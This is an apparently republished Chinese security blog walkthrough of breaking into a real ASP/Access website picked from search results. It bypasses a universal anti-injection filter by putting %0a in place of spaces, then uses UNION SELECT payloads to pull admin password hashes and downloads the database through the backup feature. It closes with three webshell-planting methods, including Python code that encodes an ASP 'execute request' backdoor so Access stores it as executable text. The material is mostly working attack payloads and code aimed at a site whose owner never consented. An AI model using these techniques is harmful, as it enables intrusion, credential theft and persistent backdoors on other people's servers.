Manual bypass of the universal code anti-injection system for an Access database

2025-03-17 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 06/01 Report


By antian365 remnant Maple simeon

This article reproduces a chain of security techniques step by step: from discovering a SQL injection point, through bypassing the universal anti-injection code that guards it, to extracting the administrator password and the database itself through the injection. SQL injection is, in effect, the door that opens everything else; where conditions permit, a webshell can be obtained as well. The key techniques for turning an Access database into a webshell are summarized at the end.

1.1 Get target information

Search Baidu for the keyword "news.asp?id=", pick a record from the results at random and open it, as shown in figure 1. Check that the site loads normally, then press F9 in Firefox to open HackBar.

Figure 1 Testing the target site

1.2 Test for the existence of SQL injection

Open any news link on the http://www.xxxxx.com/ site, for example http://www.xxxxx.com/news.asp?id=1172, and append "and 1=2" and then "and 1=1" to the address in HackBar to check for injection, as shown in figure 2. On clicking Execute, the page reports the presence of the "SQL universal anti-injection system".

Figure 2 The SQL universal anti-injection system is present

Since keyword tests are intercepted, test with arithmetic instead by appending "/" and "-0" to the id. Opening http://www.xxxxx.com/news.asp?id=1172/ gives the result in figure 3 (no content, because the trailing slash turns the query into a syntax error), while http://www.xxxxx.com/news.asp?id=1172-0 gives figure 4 (the content is shown, because the database evaluated 1172-0). The id is therefore concatenated into the query unquoted, and SQL injection clearly exists.

Figure 3 No content is shown

Figure 4 Content is shown

1.3 Bypass the SQL anti-injection system

1. POST submission cannot bypass it

Enter "and 1=1" and "and 1=2" in the Post data field, tick "Enable Post data" and click Execute to test, as shown in figure 5. The result does not change, so simply switching to a POST submission does not get past the filter.

Figure 5 POST submission cannot bypass the filter

2. Bypass by replacing the space

Changing to POST made no difference. A friend suggested that %09 (the tab character) could be used to bypass the filter, but that also failed when tested, as shown in figure 6. Replacing the space with %0a (the newline character) did bypass it, as shown in figure 7: the filter no longer recognises the keywords, while the database still treats the newline as whitespace.

Figure 6 %09 cannot bypass the filter

Figure 7 %0a bypasses the filter successfully

1.4 Get the database type, tables and fields

(1) Determine the type of database

The database type is judged from how the page reacts to "and (select count(*) from sysobjects)>0" and "and (select count(*) from msysobjects)>0". If the database is SQL Server, the first query leaves the page running normally and the second makes it abnormal; if it is Access, both make it abnormal (sysobjects does not exist in Access, and MSysObjects cannot be read without extra permissions). Submit the following in turn, with %0a in place of spaces:

and%0a(select%0acount(*)%0afrom%0asysobjects)>0

and%0a(select%0acount(*)%0afrom%0amsysobjects)>0

Both return "there is no content yet!" where the content of id=1158 should appear, so both statements are abnormal, which indicates an Access database.

(2) Determine the number of columns with ORDER BY

id=1172%0aorder%0aby%0a23 is normal

id=1172%0aorder%0aby%0a24 gives an error

"order by 23" is normal and "order by 24" errors, so the page's query returns 23 columns; this is the number of values the UNION SELECT below has to supply.

(3) Determine whether there is an admin table

and (select count(*) from admin)>0

Transformed statement:

and%0a(select%0acount(*)%0afrom%0aadmin)>0

(4) Determine whether there are user and pass fields

First guesses for the field names:

and (select count(username) from admin)>0

and (select count(password) from admin)>0

Transformed statements, with the field names that exist on this target, user and pass:

and%0a(select%0acount(user)%0afrom%0aadmin)>0

and%0a(select%0acount(pass)%0afrom%0aadmin)>0

The same method tests whether the admin table has uid and id fields: uid gives an error, as shown in figure 8, while id is normal, as shown in figure 9.

Figure 8 uid does not exist

Figure 9 id exists

1.5 Get the administrator password

Submit id=1158%0aUNION%0aSelect%0a1,2,3,4,user,pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%0afrom%0aadmin, that is, a UNION SELECT with the 23 values the query expects and user and pass in the positions the page displays, to obtain the password "5ed9ff1d48e059b50db232f497b35b45" of the admin-dh user, as shown in figure 10. After logging in to the back end with this account it turns out to have low privileges, so the passwords of the other administrators are also needed. Execute:

id=1158%0aUNION%0aSelect%0a1,2,3,4,user,pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%0afrom%0aadmin%0awhere%0aid=1, which returns the password of the user with id 1, as shown in figure 11.

Figure 10 Getting the admin-dh user's password

Figure 11 Getting the administrator zzchxj's password
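The whole chain of sections 1.3 to 1.5 (the %0a space replacement, the ORDER BY column count and the UNION SELECT extraction) can be exercised offline against a small model of the vulnerable page. The following is an added example, not code from the article or from the anti-injection product: sqlite3 stands in for the Access database, and the keyword blacklist is a hypothetical filter written to reproduce what the article observed (keywords separated by spaces or tabs are blocked, keywords separated by newlines are not). The table layout, user names and hashes are constructed, and the news query has 3 columns rather than the target's 23.

```python
"""Simulated news.asp?id= endpoint behind a keyword blacklist, backed by sqlite3.

Added example; this is not code from the original article or from the product
it bypasses. sqlite3 stands in for the Access database, and the blacklist below
is a hypothetical model that reproduces the behaviour the article observed:
keywords separated by spaces or tabs (%09) are blocked, keywords separated by
newlines (%0a) are not. Table layout, user names and hashes are constructed.
"""
import re
import sqlite3
from urllib.parse import unquote

# Hypothetical filter: a keyword is recognised only when a space or tab sits on
# both sides of it. "\n" is not in the character class, so "1%0aand%0a1=1" passes
# the filter while the SQL engine still treats the newline as whitespace.
_BLOCKLIST = re.compile(r"[ \t](and|or|select|union|order|count)[ \t]", re.IGNORECASE)


def waf_blocks(decoded: str) -> bool:
    return _BLOCKLIST.search(decoded) is not None


def build_db() -> sqlite3.Connection:
    """Constructed sample data: a 3-column news table and an admin table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table news (id integer, title text, body text)")
    conn.executemany("insert into news values (?, ?, ?)",
                     [(1158, "Notice", "first story"), (1172, "Update", "second story")])
    conn.execute("create table admin (id integer, user text, pass text)")
    conn.executemany("insert into admin values (?, ?, ?)",
                     [(1, "zzchxj", "1" * 32),      # constructed hash
                      (2, "admin-dh", "2" * 32)])   # constructed hash
    return conn


def news_page(conn: sqlite3.Connection, raw_id: str):
    """Model of news.asp?id=<raw_id>: URL-decode, run the filter, concatenate into SQL.

    Returns "WAF" (the anti-injection page), "ERROR" (script error, as in
    figure 3), "EMPTY" ("there is no content yet!") or the rows the page renders.
    """
    decoded = unquote(raw_id)
    if waf_blocks(decoded):
        return "WAF"
    try:
        rows = conn.execute("select id, title, body from news where id=" + decoded).fetchall()
    except sqlite3.Error:
        return "ERROR"
    return rows or "EMPTY"


def encode(payload: str, sep: str = "%0a") -> str:
    """Send sep (the article's %0a) wherever the SQL needs a space."""
    return payload.replace(" ", sep)


def find_column_count(conn: sqlite3.Connection, base_id: int, max_cols: int = 30) -> int:
    """ORDER BY n renders normally while n <= number of columns in the page's SELECT."""
    count = 0
    for n in range(1, max_cols + 1):
        if not isinstance(news_page(conn, encode(f"{base_id} order by {n}")), list):
            break
        count = n
    return count


def union_extract(conn: sqlite3.Connection, ncols: int, table: str, cols, where: str = ""):
    """UNION SELECT with the wanted columns placed where the page displays them.

    id=0 matches no story, so only the UNIONed rows come back; the article kept a
    real id and read the extra row that appeared below the story.
    """
    sel = [str(i) for i in range(1, ncols + 1)]   # 1,2,3,... filler, as in the article
    sel[1], sel[2] = cols                          # title and body are rendered
    payload = f"0 union select {','.join(sel)} from {table}"
    if where:
        payload += f" where {where}"
    rows = news_page(conn, encode(payload))
    return [(r[1], r[2]) for r in rows] if isinstance(rows, list) else []


if __name__ == "__main__":
    db = build_db()
    print(news_page(db, "1172 and 1=1"))                 # blocked: WAF
    print(news_page(db, encode("1172 and 1=1", "%09")))  # tab is still caught: WAF
    print(news_page(db, encode("1172 and 1=1")))         # newline slips through: the story
    n = find_column_count(db, 1172)                      # 3 columns here (23 on the real site)
    print(n, union_extract(db, n, "admin", ("user", "pass"), "id=1"))
```

The point of the model is the mismatch between the two parsers: the filter decides what "a keyword" is by looking at the bytes around it, while the SQL engine decides by its own whitespace rules, and any separator the filter does not know about but the engine accepts is a bypass. The same function pair also reproduces the "/" versus "-0" arithmetic test from section 1.2.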

1.6 Get the database

(1) Obtain information about database backups

As shown in figure 12, the back-end management has a database backup feature. The backup page shows the current database path, the backup directory, the backup database name and other information.

Figure 12 Database backup

(2) Obtain the real database name through the compress function

Click Compress, as shown in figure 13, to obtain the real name and path of the database, such as "../data-2016/@@@xxxxx###.asp". The .asp extension and the @ and # characters in the name are a common anti-download measure for Access databases; the backup feature sidesteps it by copying the file to a plain .mdb name.

Figure 13 Getting the real path and name of the database

(3) Back up and download the database

Enter "../data-2016/@@@xxxxx###.asp" as the current database path and "db1.mdb" as the backup database name. As shown in figure 14, the backup succeeds and is written on the server to d:\virtualhost\*\www\ahs*admin\Databackup\db1.mdb, so the database can be downloaded from:

http://www.xxxxx.com/ahszhdzzcadmin/Databackup/db1.mdb

Figure 14 Backing up the database

1.8 Methods of getting a webshell from an Access database

(1) Query export method

Execute the following statements (the ASP one-liner goes between the quotes of the insert statement):

create table cmd (a varchar(50))

insert into cmd (a) values ('')

select * into [a] in 'c:\wwwroot\1.asa;x.xls' 'excel 4.0' from cmd

drop table cmd

The select into exports the table through Jet's Excel 4.0 ISAM into a file named 1.asa;x.xls; on IIS 6 the file name is parsed only up to the semicolon, so the file is executed as ASP. Then connect to http://www.antian365.com/1.asa;x.xls directly with China Chopper (the "kitchen knife" webshell client).

(2) Database backup

Insert the "┼..." string anywhere that is written into the database, such as a guestbook message. It is the ASP one-liner encoded so that Access's UTF-16 text storage writes its bytes into the .mdb as plain ASCII code; backing the database up under an .asp name, as in section 1.6, then yields a backdoor whose password is a.
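The byte-level reason the "┼..." string works can be shown in a few lines. This is an added example, not code from the article: Access (Jet) stores text fields as UTF-16LE, so a string whose code units are formed from pairs of ASCII bytes is written to the .mdb file as exactly those ASCII bytes, and once the file is backed up under an .asp name IIS finds the one-liner in plain text (everything else in the file lies outside <% %> and is ignored). The payload used below is a constructed instance of the classic one-liner with password a; the encoder itself is generic.

```python
"""Why the "┼..." string becomes ASP code inside an Access database.

Added example; not from the original article. Access (Jet) stores text fields
as UTF-16LE, so a string whose code units are built from pairs of ASCII bytes
is written to the .mdb as those ASCII bytes. When the database is then backed
up under an .asp name, the file on disk contains the one-liner in plain text
and IIS executes it; everything else in the file is outside <% %> and ignored.
The payload used in __main__ is a constructed example of the classic one-liner.
"""


def to_access_unicode(ascii_payload: str, pad: str = " ") -> str:
    """Text to type into a field (guestbook message, etc.) so the stored bytes equal ascii_payload.

    Each pair of payload bytes becomes one little-endian UTF-16 code unit, e.g.
    "<%" (0x3C 0x25) becomes U+253C, the box-drawing character "┼". The payload
    must have an even byte length; an odd one is padded with a harmless trailing
    character that ends up after %> in the rendered page.
    """
    if len(ascii_payload) % 2:
        ascii_payload += pad
    return ascii_payload.encode("ascii").decode("utf-16-le")


def on_disk_bytes(stored_text: str) -> bytes:
    """What Jet writes for that text field: the original ASCII payload."""
    return stored_text.encode("utf-16-le")


def roundtrips(ascii_payload: str, pad: str = " ") -> bool:
    """Check that the encode step really yields the payload bytes on disk."""
    encoded = to_access_unicode(ascii_payload, pad)
    expected = (ascii_payload + (pad if len(ascii_payload) % 2 else "")).encode("ascii")
    return on_disk_bytes(encoded) == expected


if __name__ == "__main__":
    shell = to_access_unicode('<% execute request("a")%>', pad="a")  # backdoor password "a"
    print(shell)                 # 13 characters, beginning with "┼" like the article's string
    print(on_disk_bytes(shell))  # the ASCII one-liner, as it will sit in the backed-up .asp
```

Two practical caveats follow from the encoding: the string has to reach the database unchanged (the form and the page codepage must pass the CJK characters through intact, and the target column must be a text or memo field long enough to hold it), and the raw .mdb is only executed once a copy of it carries an .asp extension, which is what the backup step in section 1.6 provides.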

(3) Database backup of an image

Upload an image with the one-liner backdoor appended to the end of the file, note the exact address of the uploaded image, then in the backup function set the current database path to that image file and the backup name to an .asp path, for example /databacp/1.asp, to obtain the webshell.

